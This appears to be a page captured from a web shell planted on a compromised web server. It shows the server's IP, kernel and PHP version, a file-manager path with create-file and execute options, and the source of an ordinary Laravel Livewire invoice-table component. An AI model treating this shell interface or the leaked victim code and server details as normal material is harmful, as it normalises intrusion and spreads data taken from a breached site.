⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.138
Server IP:
186.226.58.36
Server:
Linux da02.sh15.net 3.10.0-1160.119.1.vz7.224.4 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Server Software:
Apache/2
PHP Version:
8.1.32
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
redesystem
/
public_html
/
sys
/
app
/
Livewire
/
View File Name :
ClientInvoiceTable.php
<?php namespace App\Livewire; use App\Models\Invoice; use Illuminate\Database\Eloquent\Builder; use Illuminate\Support\Facades\Auth; use Rappasoft\LaravelLivewireTables\Views\Column; class ClientInvoiceTable extends LivewireTableComponent { protected $model = Invoice::class; protected string $tableName = 'invoices'; public $showButtonOnHeader = true; public $buttonComponent = 'client_panel.invoices.components.add-button'; public bool $showFilterOnHeader = true; public $filterComponent = ['client_panel.invoices.components.filter', Invoice::STATUS_ARR]; public $listeners = ['changeInvoiceStatusFilter', 'changeRecurringStatusFilter', 'resetPageTable','changeDateRangeFilter']; public $status = Invoice::STATUS_ALL; public array $dateRange = []; protected $queryString = ['status']; public function configure(): void { $this->setPrimaryKey('id'); $this->setDefaultSort('created_at', 'desc'); $this->setQueryStringStatus(false); $this->setThAttributes(function (Column $column) { if (in_array($column->getField(), ['id', 'status'])) { return [ 'class' => 'text-center', ]; } if ($column->isField('final_amount')) { return [ 'class' => 'd-flex justify-content-end', ]; } if ($column->isField('amount')) { return [ 'class' => 'text-end', ]; } return []; }); $this->setTdAttributes(function (Column $column, $row, $columnIndex, $rowIndex) { if (in_array($column->getField(), ['id', 'status'])) { return [ 'class' => 'text-center', ]; } if (in_array($column->getField(), ['final_amount', 'amount'])) { return [ 'class' => 'text-end', ]; } return []; }); } public function columns(): array { return [ Column::make(__('messages.invoice.invoice_id'), 'invoice_id') ->sortable() ->searchable() ->view('client_panel.invoices.components.invoice-id'), Column::make('invoice_id', 'invoice_id') ->sortable() ->searchable()->hideIf(1), Column::make('Last Name', 'client.user.last_name') ->sortable() ->searchable()->hideIf(1), Column::make(__('messages.invoice.invoice_date'), 'invoice_date') ->sortable() ->searchable() ->format(function ($value, $row, Column $column) { return view('invoices.components.invoice-due-date') ->withValue([ 'invoice-date' => $row->invoice_date, ]); }), Column::make(__('messages.invoice.due_date'), 'due_date') ->sortable() ->searchable() ->format(function ($value, $row, Column $column) { return view('invoices.components.invoice-due-date') ->withValue([ 'due-date' => $row->due_date, ]); }), Column::make(__('messages.invoice.amount'), 'final_amount') ->sortable() ->searchable() ->view('invoices.components.amount'), Column::make(__('messages.invoice.transactions'), 'amount') ->searchable() ->view('invoices.components.transaction'), Column::make(__('messages.common.status'), 'status') ->searchable() ->view('invoices.components.transaction-status'), Column::make(__('messages.common.action'), 'id') ->view('livewire.client-invoice-action-button'), ]; } public function builder(): Builder { $clientId = Auth::user()->client->id; $query = Invoice::with(['client.user', 'payments'])->where('invoices.client_id', $clientId) ->where('invoices.status', '!=', Invoice::DRAFT); $query->when($this->status != '' && $this->status != Invoice::STATUS_ALL, function ($query) { $query->where('invoices.status', $this->status); }); $query->when(count($this->dateRange) > 0, function ($query) { $startDate = $this->dateRange[0]; $endDate = $this->dateRange[1]; $query->whereBetween('invoices.invoice_date', [$startDate, $endDate]); }); return $query->select('invoices.*'); } public function changeInvoiceStatusFilter($status) { $this->status = $status; $this->setBuilder($this->builder()); } public function changeDateRangeFilter($startDate, $endDate) { $this->dateRange = [$startDate, $endDate]; $this->setBuilder($this->builder()); $this->resetPagination(); } public function resetPagination() { $this->resetPage('invoicesPage'); } public function placeholder() { return view('livewire.client_invoice_listing_skeleton'); } }